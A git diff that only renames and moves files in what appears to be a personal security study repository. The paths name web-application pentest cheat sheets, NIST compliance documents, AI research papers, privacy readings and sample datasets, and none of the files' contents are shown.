diff --git a/References/Get_Started-MaderasSecurityArsenal.md b/CheatSheets/Get_Started-MaderasSecurityArsenal.md
similarity index 100%
rename from References/Get_Started-MaderasSecurityArsenal.md
rename to CheatSheets/Get_Started-MaderasSecurityArsenal.md
diff --git a/References/Search_Engines_for_Pentesters.jpg b/CheatSheets/Search_Engines_for_Pentesters.jpg
similarity index 100%
rename from References/Search_Engines_for_Pentesters.jpg
rename to CheatSheets/Search_Engines_for_Pentesters.jpg
diff --git "a/References/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf" "b/CheatSheets/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf"
similarity index 100%
rename from "References/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf"
rename to "CheatSheets/Using Cloudflare to bypass Cloudflare \342\200\223 Certitude Blog.pdf"
diff --git a/Web-Applications/CORS.md b/CheatSheets/Web-Applications/CORS.md
similarity index 100%
rename from Web-Applications/CORS.md
rename to CheatSheets/Web-Applications/CORS.md
diff --git a/Web-Applications/CSRF.md b/CheatSheets/Web-Applications/CSRF.md
similarity index 100%
rename from Web-Applications/CSRF.md
rename to CheatSheets/Web-Applications/CSRF.md
diff --git a/Web-Applications/HTML.md b/CheatSheets/Web-Applications/HTML.md
similarity index 100%
rename from Web-Applications/HTML.md
rename to CheatSheets/Web-Applications/HTML.md
diff --git a/Web-Applications/PathTraversal.md b/CheatSheets/Web-Applications/PathTraversal.md
similarity index 100%
rename from Web-Applications/PathTraversal.md
rename to CheatSheets/Web-Applications/PathTraversal.md
diff --git a/Web-Applications/README.md b/CheatSheets/Web-Applications/README.md
similarity index 100%
rename from Web-Applications/README.md
rename to CheatSheets/Web-Applications/README.md
diff --git a/Web-Applications/SQL_injection_payloads.md b/CheatSheets/Web-Applications/SQL_injection_payloads.md
similarity index 100%
rename from Web-Applications/SQL_injection_payloads.md
rename to CheatSheets/Web-Applications/SQL_injection_payloads.md
diff --git a/Web-Applications/SSRF_bypassFilters.txt b/CheatSheets/Web-Applications/SSRF_bypassFilters.md
similarity index 100%
rename from Web-Applications/SSRF_bypassFilters.txt
rename to CheatSheets/Web-Applications/SSRF_bypassFilters.md
diff --git a/Web-Applications/WebApp-ExploitsChecklist.pdf b/CheatSheets/Web-Applications/WebApp-ExploitsChecklist.pdf
similarity index 100%
rename from Web-Applications/WebApp-ExploitsChecklist.pdf
rename to CheatSheets/Web-Applications/WebApp-ExploitsChecklist.pdf
diff --git a/Web-Applications/XSS.md b/CheatSheets/Web-Applications/XSS.md
similarity index 100%
rename from Web-Applications/XSS.md
rename to CheatSheets/Web-Applications/XSS.md
diff --git a/Web-Applications/XSS_contexts.md b/CheatSheets/Web-Applications/XSS_contexts.md
similarity index 100%
rename from Web-Applications/XSS_contexts.md
rename to CheatSheets/Web-Applications/XSS_contexts.md
diff --git a/Web-Applications/injection_fundamentals.md b/CheatSheets/Web-Applications/injection_fundamentals.md
similarity index 100%
rename from Web-Applications/injection_fundamentals.md
rename to CheatSheets/Web-Applications/injection_fundamentals.md
diff --git a/Web-Applications/web_hacking_example_workflow.md b/CheatSheets/Web-Applications/web_hacking_example_workflow.md
similarity index 100%
rename from Web-Applications/web_hacking_example_workflow.md
rename to CheatSheets/Web-Applications/web_hacking_example_workflow.md
diff --git a/References/linux_performance_tuning.jpg b/CheatSheets/linux_performance_tuning.jpg
similarity index 100%
rename from References/linux_performance_tuning.jpg
rename to CheatSheets/linux_performance_tuning.jpg
diff --git a/References/splunk-quick-reference-guide_6-7-24.pdf b/CheatSheets/splunk-quick-reference-guide_6-7-24.pdf
similarity index 100%
rename from References/splunk-quick-reference-guide_6-7-24.pdf
rename to CheatSheets/splunk-quick-reference-guide_6-7-24.pdf
diff --git "a/References/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf" "b/CheatSheets/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf"
similarity index 100%
rename from "References/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf"
rename to "CheatSheets/text-processing/Parsing for Pentesters - F\342\200\231Awk Yeah! Advanced sed and awk Usage (Parsing for Pentesters 3) _ by Jeff Dimmock _ Posts By SpecterOps Team Members.pdf"
diff --git a/References/text-processing/Text_Processing_and_Shell_Operations.md b/CheatSheets/text-processing/Text_Processing_and_Shell_Operations.md
similarity index 100%
rename from References/text-processing/Text_Processing_and_Shell_Operations.md
rename to CheatSheets/text-processing/Text_Processing_and_Shell_Operations.md
diff --git a/Documents/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf b/EduDocuments/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/A Rubric for ML Production Readiness and Technical Debt Reduction.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf b/EduDocuments/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/AI_systems_as_state_actors-Crawford-Schultz.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/Better and Faster Large Language Models via Multi-token Prediction 2404.19737v1.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/Code Generation with AlphaCodium From Prompt Engineering to Flow-2401.08500.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf b/EduDocuments/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/HistoryOfSecretary_GenderRoles_&AISecretaries-Crwaford.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/Least-to-Most Prompting Enables Complex Reasoning in Large Language Models-2205.10625.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/Mamba Linear-Time Sequence Modeling with Selective State Spaces 2312.00752.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf b/EduDocuments/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/PowerWithoutResponsibilityInAI-Crawford.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf b/EduDocuments/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/RAPTOR RECURSIVE ABSTRACTIVE PROCESSING - 2401.18059.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf b/EduDocuments/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/ReAct-SYNERGIZING REASONING AND ACTING IN LANGUAGE MODELS-2210.03629.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf b/EduDocuments/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/SustAIn_Magazine_2022_EN.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf b/EduDocuments/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/Tree of Thoughts - Deliberate Problem Solving with LLMs - Machine Learning - AI.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf b/EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-map.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf b/EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/ai-anatomy-publication-Crawford.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf b/EduDocuments/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/corrective-retrieval-augmented-generation-2401.15884.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf b/EduDocuments/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/mckinsey_and_company_whats-the-future-of-generative-ai-an-early-view-in-15-charts.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf b/EduDocuments/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/practitioners_guide_to_mlops_whitepaper.pdf
diff --git a/Documents/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf b/EduDocuments/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf
rename to EduDocuments/Continuous-Learning/Generative-AI/self-reflective-retrieval-augmented-generation-2310.11511.pdf
diff --git a/Documents/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf b/EduDocuments/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf
rename to EduDocuments/Continuous-Learning/Privacy/Brave_Goggles_whitepaper.pdf
diff --git a/Documents/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf b/EduDocuments/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf
rename to EduDocuments/Continuous-Learning/Privacy/Extreme Privacy-Data Removal Workbook.pdf
diff --git a/Documents/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf b/EduDocuments/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf
rename to EduDocuments/Continuous-Learning/Privacy/HowCivilRightsViolationsImpactPoliceData_Whitepaper-Crawford.pdf
diff --git a/Documents/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf b/EduDocuments/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf
rename to EduDocuments/Continuous-Learning/Privacy/RecordsComputersandtheRightsofCitizens.pdf
diff --git a/Documents/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf b/EduDocuments/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf
rename to EduDocuments/Continuous-Learning/Privacy/The Internet and Democracy Global Catalyst or Democratic Dud.pdf
diff --git a/Documents/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf b/EduDocuments/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf
similarity index 100%
rename from Documents/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf
rename to EduDocuments/Continuous-Learning/Privacy/TheFutureOfOnlineAdvertising.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/06_Rogers_Bienvenue_CDR_V6N3_2021.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/2016-02-01-Scientific-American-How-Data-Brokers-Make-Money-Off-Your-Medical-Records(1).pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/20210122_CW Final.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/A Resource Guide on racial Profiling Data Collection Systems.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/AD1044678.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Apple spyPhone - Public-Statement-Siri-recordings-TLB.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/CIA report on consciousness.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Cognitive Warfare.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Containment Control for a Social network with State-Dependent Connectivity.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Edward Snowden_Permanent Record.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o5o2WYAAiFrl.png
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-o_zoX0AUynbv.png
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pKfMWYAA7WPk.png
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FB-pRL-X0AU0GdI.png
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FBI_CAST_PhoneGeoLocationGuide.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/FR2568pXEAshq3o.jfif
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/Memo197_e_compressed.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NATO-Comprehensive-Approach-Report-2021_final.pdf
diff --git a/Documents/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf b/EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf
similarity index 100%
rename from Documents/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf
rename to EduDocuments/Continuous-Learning/US-State_Surveillance-Psyops/NDC fm_9.pdf
diff --git a/Documents/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx b/EduDocuments/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx
similarity index 100%
rename from Documents/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx
rename to EduDocuments/Pentest_Resources-TCM_Security/Demo Company - Security Assessment Findings Report.docx
diff --git a/Documents/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf b/EduDocuments/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf
similarity index 100%
rename from Documents/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf
rename to EduDocuments/Pentest_Resources-TCM_Security/Subnetting - Cheat Sheet.pdf
diff --git a/Documents/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx b/EduDocuments/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx
similarity index 100%
rename from Documents/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx
rename to EduDocuments/Pentest_Resources-TCM_Security/TCMS - External Pentest Checklist.xlsx
diff --git a/Documents/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf b/EduDocuments/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf
similarity index 100%
rename from Documents/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf
rename to EduDocuments/Pentest_Resources-TCM_Security/sample-penetration-testing-report__OffensiveSecurity.pdf
diff --git a/Documents/Compliance/800-171/NIST.SP.800-171r2.pdf b/EduDocuments/RegulatoryCompliance/800-171/NIST.SP.800-171r2.pdf
similarity index 100%
rename from Documents/Compliance/800-171/NIST.SP.800-171r2.pdf
rename to EduDocuments/RegulatoryCompliance/800-171/NIST.SP.800-171r2.pdf
diff --git a/Documents/Compliance/800-171/sp800-171r2-security-reqs.xlsx b/EduDocuments/RegulatoryCompliance/800-171/sp800-171r2-security-reqs.xlsx
similarity index 100%
rename from Documents/Compliance/800-171/sp800-171r2-security-reqs.xlsx
rename to EduDocuments/RegulatoryCompliance/800-171/sp800-171r2-security-reqs.xlsx
diff --git a/Documents/Compliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf b/EduDocuments/RegulatoryCompliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf
similarity index 100%
rename from Documents/Compliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf
rename to EduDocuments/RegulatoryCompliance/800-53r5/SP_800-53_v5_1-derived-OSCAL.pdf
diff --git a/Documents/Compliance/800-53r5/sp800-53r5-control-catalog.xlsx b/EduDocuments/RegulatoryCompliance/800-53r5/sp800-53r5-control-catalog.xlsx
similarity index 100%
rename from Documents/Compliance/800-53r5/sp800-53r5-control-catalog.xlsx
rename to EduDocuments/RegulatoryCompliance/800-53r5/sp800-53r5-control-catalog.xlsx
diff --git a/Documents/Compliance/800-63/NIST.SP.800-63-3.pdf b/EduDocuments/RegulatoryCompliance/800-63/NIST.SP.800-63-3.pdf
similarity index 100%
rename from Documents/Compliance/800-63/NIST.SP.800-63-3.pdf
rename to EduDocuments/RegulatoryCompliance/800-63/NIST.SP.800-63-3.pdf
diff --git a/Documents/Compliance/800-63/nist.sp.800-63a.pdf b/EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63a.pdf
similarity index 100%
rename from Documents/Compliance/800-63/nist.sp.800-63a.pdf
rename to EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63a.pdf
diff --git a/Documents/Compliance/800-63/nist.sp.800-63b.pdf b/EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63b.pdf
similarity index 100%
rename from Documents/Compliance/800-63/nist.sp.800-63b.pdf
rename to EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63b.pdf
diff --git a/Documents/Compliance/800-63/nist.sp.800-63c.pdf b/EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63c.pdf
similarity index 100%
rename from Documents/Compliance/800-63/nist.sp.800-63c.pdf
rename to EduDocuments/RegulatoryCompliance/800-63/nist.sp.800-63c.pdf
diff --git a/Documents/Compliance/800-66r2/NIST.SP.800-66r2.pdf b/EduDocuments/RegulatoryCompliance/800-66r2/NIST.SP.800-66r2.pdf
similarity index 100%
rename from Documents/Compliance/800-66r2/NIST.SP.800-66r2.pdf
rename to EduDocuments/RegulatoryCompliance/800-66r2/NIST.SP.800-66r2.pdf
diff --git a/Documents/Compliance/NIST.CSWP.04162018.pdf b/EduDocuments/RegulatoryCompliance/NIST.CSWP.04162018.pdf
similarity index 100%
rename from Documents/Compliance/NIST.CSWP.04162018.pdf
rename to EduDocuments/RegulatoryCompliance/NIST.CSWP.04162018.pdf
diff --git a/Documents/Compliance/visa-cisp-what-to-do-if-compromised.pdf b/EduDocuments/RegulatoryCompliance/visa-cisp-what-to-do-if-compromised.pdf
similarity index 100%
rename from Documents/Compliance/visa-cisp-what-to-do-if-compromised.pdf
rename to EduDocuments/RegulatoryCompliance/visa-cisp-what-to-do-if-compromised.pdf
diff --git a/Documents/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv b/EduDocuments/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv
similarity index 100%
rename from Documents/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv
rename to EduDocuments/Sample_Datasets/BigML_Dataset_5f50a62795a9306aa200003e.csv
diff --git a/Documents/Sample_Datasets/Global YouTube Statistics.csv b/EduDocuments/Sample_Datasets/Global YouTube Statistics.csv
similarity index 100%
rename from Documents/Sample_Datasets/Global YouTube Statistics.csv
rename to EduDocuments/Sample_Datasets/Global YouTube Statistics.csv
